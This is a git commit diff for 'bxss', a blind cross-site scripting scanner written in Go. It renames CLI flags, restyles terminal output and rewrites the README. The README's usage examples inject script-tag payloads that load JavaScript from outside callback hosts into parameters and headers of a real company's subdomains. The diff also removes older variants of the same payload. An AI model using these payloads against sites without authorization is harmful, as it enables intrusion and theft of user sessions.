chore: added in more flags and updated terminal output

ethicalhackingplayground · ethicalhackingplayground · commit f1038eb28e50 · 2025-03-16T09:37:54.000+11:00
diff --git a/README.md b/README.md
@@ -1,75 +1,94 @@
 <h1 align="center">
   <br>
-<img src="https://github.com/ethicalhackingplayground/bxss/blob/master/static/blinded-drib.jpg" width="200px" alt="Bxss">
+  <img src="https://github.com/ethicalhackingplayground/bxss/blob/master/static/blinded-drib.png" width="200px" alt="Bxss">
+  <br>
+  Bxss - Blind XSS Scanner
 </h1>
-<h1 align="center">
-Bxss - Blind XSS Scanner
 
-[![Version](https://img.shields.io/github/v/release/ethicalhackingplayground/bxss?style=flat-square)](https://github.com/ethicalhackingplayground/bxss/releases/latest)
-[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square)](https://github.com/ethicalhackingplayground/bxss/blob/master/LICENSE)
-[![Go Report Card](https://goreportcard.com/badge/github.com/ethicalhackingplayground/bxss?style=flat-square)](https://goreportcard.com/report/github.com/ethicalhackingplayground/bxss)
-[![Go Reference](https://pkg.go.dev/badge/github.com/ethicalhackingplayground/bxss.svg)](https://pkg.go.dev/github.com/ethicalhackingplayground/bxss)
+<p align="center">
+  <a href="https://github.com/ethicalhackingplayground/bxss/releases/latest">
+    <img src="https://img.shields.io/github/v/release/ethicalhackingplayground/bxss?style=flat-square" alt="Version">
+  </a>
+  <a href="https://github.com/ethicalhackingplayground/bxss/blob/master/LICENSE">
+    <img src="https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square" alt="License">
+  </a>
+  <a href="https://goreportcard.com/report/github.com/ethicalhackingplayground/bxss">
+    <img src="https://goreportcard.com/badge/github.com/ethicalhackingplayground/bxss?style=flat-square" alt="Go Report Card">
+  </a>
+  <a href="https://pkg.go.dev/github.com/ethicalhackingplayground/bxss">
+    <img src="https://pkg.go.dev/badge/github.com/ethicalhackingplayground/bxss.svg" alt="Go Reference">
+  </a>
+</p>
 
-## </h1>
-
-## Description
+---
 
-Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.
+## 🚀 Description
+Bxss is a high-performance Blind XSS scanner that automates the detection of blind XSS vulnerabilities in web applications.
 
 ---
 
-### Features
+## ✨ Features
+- Injects Blind XSS payloads into custom headers & parameters
+- Supports multiple HTTP methods (PUT, POST, GET, OPTIONS)
+- High-speed scanning with concurrency support
+- Easily chainable with other tools
+- Simple installation and usage
 
-- Inject Blind XSS payloads into custom headers
-- Inject Blind XSS payloads into parameters
-- Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
-- Tool Chaining
-- Really fast
-- Easy to setup
-
-## Install
+---
 
-```
+## 📦 Installation
+```bash
 go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
 ```
 
 ---
 
-## Arguments
-
-| Argument              | Description                              | Default      |
-| --------------------- | ---------------------------------------- | ------------ |
-| `-appendMode`         | Append the payload to the parameter      |              |
-| `-concurrency int`    | Set the concurrency                      | 30           |
-| `-header string`      | Set the custom header                    | "User-Agent" |
-| `-headerFile string`  | Path to file containing headers to test  |              |
-| `-parameters`         | Test the parameters for blind xss        |              |
-| `-payload string`     | The blind XSS payload                    |              |
-| `-payloadFile string` | Path to file containing payloads to test |              |
-
+## ⚙️ Arguments
+
+| Argument       | Description                                             | Default  |
+| ------------- | -------------------------------------------------------- | -------- |
+| `-a`          | Append the payload to the parameter                      | `false`  |
+| `-c int`      | Set the concurrency level                                | `30`     |
+| `-H string`   | Set a custom header                                      | `""`     |
+| `-hf string`  | Path to file with headers                                | `""`     |
+| `-p string`   | The blind XSS payload                                    | `""`     |
+| `-pf string`  | Path to file with payloads                               | `""`     |
+| `-t`          | Test parameters for blind XSS                            | `false`  |
+| `-X string`   | HTTP method to use                                       | `""`  |
+| `-v`          | Enable debug mode                                        | `false`  |
+| `-rl float`   | Rate limit (requests per second)                         | `0`      |
+| `-f`          | Follow redirects                                         | `false`  |
 ---
 
-## Demonstration
-
-[![asciicast](https://asciinema.org/a/mPB0Vms70kvD8dd99BwYi1ucm.svg)](https://asciinema.org/a/mPB0Vms70kvD8dd99BwYi1ucm)
+## 🎬 Demonstration
+<p align="center">
+  <a href="https://asciinema.org/a/mPB0Vms70kvD8dd99BwYi1ucm">
+    <img src="https://asciinema.org/a/mPB0Vms70kvD8dd99BwYi1ucm.svg" alt="Demo">
+  </a>
+</p>
 
 ---
 
-### Blind XSS In Parameters
+## 🔥 Usage Examples
 
+### Injecting Blind XSS Into Parameters
 ```bash
-subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters
+subfinder -d uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://xss.report/c/username></script>' -parameters
 ```
 
-### Blind XSS In X-Forwarded-For Header
-
+### Injecting Blind XSS Into X-Forwarded-For Header
 ```bash
-subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
+subfinder -d uber.com | gau | bxss -payload '"><script src=https://xss.report/c/username></script> -header "X-Forwarded-For"
 ```
 
 ---
 
-**If you get a bounty please support by buying me a coffee**
+## ☕ Support the Project
+If you get a bounty using this tool, consider supporting by buying me a coffee!
+
+<p align="center">
+  <a href="https://buymeacoffee.com/zoidsec" target="_blank">
+    <img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;">
+  </a>
+</p>
 
-<br>
-<a href="https://buymeacoffee.com/zoidsec" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
diff --git a/static/blinded-drib.jpg b/static/blinded-drib.jpg
diff --git a/static/blinded-drib.png b/static/blinded-drib.png
diff --git a/v2/cmd/bxss/main.go b/v2/cmd/bxss/main.go
@@ -36,7 +36,7 @@ func main() {
 	// Create the payload parser
 	payloadParser := payloads.NewPayload(args)
 	if payloadParser == nil {
-		fmt.Printf(colours.ErrorColor, "Error creating payload parser: ", "Something went wrong")
+		fmt.Printf(colours.ErrorColor, "Error creating payload parser: "+"Something went wrong")
 		os.Exit(1)
 	}
 
@@ -45,7 +45,7 @@ func main() {
 		var err error
 		headers, err = payloadParser.ReadLinesFromFile()
 		if err != nil {
-			fmt.Printf(colours.ErrorColor, "Error reading header file: ", err.Error())
+			fmt.Printf(colours.ErrorColor, "Error reading header file: "+err.Error())
 			return
 		}
 	} else if args.Header != "" {
@@ -57,14 +57,14 @@ func main() {
 		var err error
 		payloads, err = payloadParser.ReadLinesFromFile()
 		if err != nil {
-			fmt.Printf(colours.ErrorColor, "Error reading payload file: ", err.Error())
+			fmt.Printf(colours.ErrorColor, "Error reading payload file: "+err.Error())
 			return
 		}
 	} else if args.Payload != "" {
 		payloads = []string{args.Payload}
 	}
 
-	fmt.Printf(colours.NoticeColor, "\n[-] Please Be Patient for bxss\n ", "")
+	fmt.Printf(colours.NoticeColor, "Please Be Patient for bxss"+"")
 
 	// Create a channel to send work items to the worker pool
 	workChan := make(chan string)
@@ -93,7 +93,7 @@ func main() {
 			workChan <- link
 		}
 		if err := scanner.Err(); err != nil {
-			fmt.Printf(colours.ErrorColor, "Error reading input: ", err.Error())
+			fmt.Printf(colours.ErrorColor, "Error reading input: "+err.Error())
 		}
 		close(workChan)
 	}()
diff --git a/v2/go.sum b/v2/go.sum
@@ -14,6 +14,10 @@ github.com/josharian/intern v1.0.0 h1:vlS4z54oSdjm0bgjRigI+G1HpF+tI+9rE5LLzOg8Hm
 github.com/josharian/intern v1.0.0/go.mod h1:5DoeVV0s6jJacbCEi61lwdGj/aVlrQvzHFFd8Hwg//Y=
 github.com/ledongthuc/pdf v0.0.0-20220302134840-0c2507a12d80 h1:6Yzfa6GP0rIo/kULo2bwGEkFvCePZ3qHDDTC3/J9Swo=
 github.com/ledongthuc/pdf v0.0.0-20220302134840-0c2507a12d80/go.mod h1:imJHygn/1yfhB7XSJJKlFZKl/J+dCPAknuiaGOshXAs=
+github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8=
+github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4=
+github.com/logrusorgru/aurora/v4 v4.0.0 h1:sRjfPpun/63iADiSvGGjgA1cAYegEWMPCJdUpJYn9JA=
+github.com/logrusorgru/aurora/v4 v4.0.0/go.mod h1:lP0iIa2nrnT/qoFXcOZSrZQpJ1o6n2CUf/hyHi2Q4ZQ=
 github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0=
 github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
 github.com/orisano/pixelmatch v0.0.0-20220722002657-fb0b55479cde h1:x0TT0RDC7UhAVbbWWBzr41ElhJx5tXPWkIHA2HWPRuw=
diff --git a/v2/pkg/arguments/arguments.go b/v2/pkg/arguments/arguments.go
@@ -14,21 +14,21 @@ type Arguments struct {
 	HeaderFile      string
 	Payload         string
 	PayloadFile     string
+	Method          string
 	AppendMode      bool
 	Parameters      bool
 	Debug           bool
 	RateLimit       float64
 	FollowRedirects bool
-	ShowTimestamp   bool
 }
 
 // Flag variables
 var (
 	debug           bool
-	showTimestamp   bool
 	concurrency     int
 	payload         string
 	payloadFile     string
+	method          string
 	header          string
 	headerFile      string
 	appendMode      bool
@@ -43,15 +43,15 @@ func (a *Arguments) ValidateArgs() {
 
 	// The banner
 	fmt.Printf(colours.BannerColor, `
-	  ____               
-	 |  _ \              
- 	 | |_) |_  _____ ___ 
-	 |  * <\ \/ / *_/ __|
-	 | |_) |>  <\__ \__ \
-	 |____//_/\_\___/___/
-	                     
-                    
-	`, "-- Coded by @z0idsec -- \n")
+  ____                     
+ | __ )  __  __  ___   ___ 
+ |  _ \  \ \/ / / __| / __|
+ | |_) |  >  <  \__ \ \__ \
+ |____/  /_/\_\ |___/ |___/
+                                        
+	`, "")
+	fmt.Printf(colours.TextColor, "", "v0.0.3")
+	fmt.Printf("\n")
 
 	// Check if at least one header and one payload option is provided
 	if (a.Header == "" && a.HeaderFile == "") && (a.Payload == "" && a.PayloadFile == "") {
@@ -67,17 +67,17 @@ func (a *Arguments) ValidateArgs() {
 func NewArguments() *Arguments {
 
 	// Define the flags
-	flag.IntVar(&concurrency, "concurrency", 30, "Set the concurrency")
-	flag.StringVar(&header, "header", "", "Set a single custom header")
-	flag.StringVar(&headerFile, "headerFile", "", "Path to file containing headers to test")
-	flag.StringVar(&payload, "payload", "", "The blind XSS payload")
-	flag.StringVar(&payloadFile, "payloadFile", "", "Path to file containing payloads to test")
-	flag.BoolVar(&appendMode, "appendMode", false, "Append the payload to the parameter")
-	flag.BoolVar(&parameters, "parameters", false, "Test the parameters for blind xss")
-	flag.BoolVar(&debug, "debug", false, "Enable debug mode to view full request details")
-	flag.Float64Var(&rateLimit, "rl", 0, "Rate limit in requests per second (optional)")
-	flag.BoolVar(&followRedirects, "r", false, "Follow redirects (optional)")
-	flag.BoolVar(&showTimestamp, "ts", false, "Show timestamp for each request (optional)")
+	flag.IntVar(&concurrency, "c", 30, "Set the concurrency level for the scanner")
+	flag.StringVar(&header, "H", "", "Set a single custom header to test for blind XSS")
+	flag.StringVar(&headerFile, "hf", "", "Path to file containing headers to test for blind XSS")
+	flag.StringVar(&payload, "p", "", "The blind XSS payload to test")
+	flag.StringVar(&payloadFile, "pf", "", "Path to file containing payloads to test for blind XSS")
+	flag.BoolVar(&appendMode, "a", false, "Append the payload to the parameter value when testing")
+	flag.BoolVar(&parameters, "t", false, "Test the parameters for blind XSS by appending the payload to the parameter value")
+	flag.StringVar(&method, "X", "", "The HTTP method to use when testing (GET, POST, etc.)")
+	flag.BoolVar(&debug, "v", false, "Enable debug mode to view full request details and debug information")
+	flag.Float64Var(&rateLimit, "rl", 0, "Rate limit in requests per second (optional to prevent abuse)")
+	flag.BoolVar(&followRedirects, "f", false, "Follow redirects when testing (optional)")
 
 	// Parse the arguments
 	flag.Parse()
@@ -88,11 +88,11 @@ func NewArguments() *Arguments {
 		HeaderFile:      headerFile,
 		Payload:         payload,
 		PayloadFile:     payloadFile,
+		Method:          method,
 		AppendMode:      appendMode,
 		Parameters:      parameters,
 		Debug:           debug,
 		RateLimit:       rateLimit,
 		FollowRedirects: followRedirects,
-		ShowTimestamp:   showTimestamp,
 	}
 }
diff --git a/v2/pkg/colours/colours.go b/v2/pkg/colours/colours.go
@@ -4,9 +4,9 @@ package colours
 const (
 	BannerColor  = "\033[1;34m%s\033[0m\033[1;36m%s\033[0m"
 	TextColor    = "\033[1;0m%s\033[1;32m%s\n\033[0m"
-	InfoColor    = "\033[1;0m%s\033[1;35m%s\033[0m"
-	NoticeColor  = "\033[1;0m%s\033[1;34m%s\n\033[0m"
-	WarningColor = "\033[1;33m%s%s\033[0m"
-	ErrorColor   = "\033[1;31m%s%s\033[0m"
-	DebugColor   = "\033[0;36m%s%s\033[0m"
+	InfoColor    = "\033[1;37m[\033[1;32mINFO\033[1;37m]\033[0m %s\n"
+	NoticeColor  = "\033[1;37m[\033[1;34mNOTICE\033[1;37m]\033[0m %s\n"
+	WarningColor = "\033[1;37m[\033[1;34mNOTICE\033[1;37m]\033[0m %s\n"
+	ErrorColor   = "\033[1;37m[\033[1;31mERROR\033[1;37m]\033[0m %s\n"
+	DebugColor   = "\033[1;37m[\033[0;36mDEBUG\033[1;37m]\033[0m %s\n"
 )
diff --git a/v2/pkg/payloads/payloads.go b/v2/pkg/payloads/payloads.go
@@ -58,9 +58,17 @@ func (p *PayloadParser) ReadLinesFromFile() ([]string, error) {
 // If there is an error reading the input, that error is printed to standard
 // error. Otherwise, the function prints nothing and returns no value.
 func (p *PayloadParser) ProcessPayloadsAndHeaders(limiter *rate.Limiter, link string, payloads []string, headers []string) {
-	newScanner := scan.NewScanner(limiter, p.args.RateLimit, p.args.FollowRedirects, p.args.AppendMode, p.args.Parameters, p.args.Debug, p.args.ShowTimestamp)
+	config := &scan.ScannerConfig{
+		AppendMode:      p.args.AppendMode,
+		IsParameters:    p.args.Parameters,
+		RateLimit:       p.args.RateLimit,
+		Method:          p.args.Method,
+		FollowRedirects: p.args.FollowRedirects,
+		Debug:           p.args.Debug,
+	}
+	newScanner := scan.NewScanner(limiter, config)
 	link = p.EnsureProtocol(link)
-	fmt.Printf(colours.NoticeColor, "[+] Checking Url Scheme: ", link)
+	fmt.Printf(colours.NoticeColor, "Checking URL Scheme: "+link)
 	fmt.Println("")
 	if len(headers) == 0 {
 		for _, payload := range payloads {
diff --git a/v2/pkg/scan/scan.go b/v2/pkg/scan/scan.go
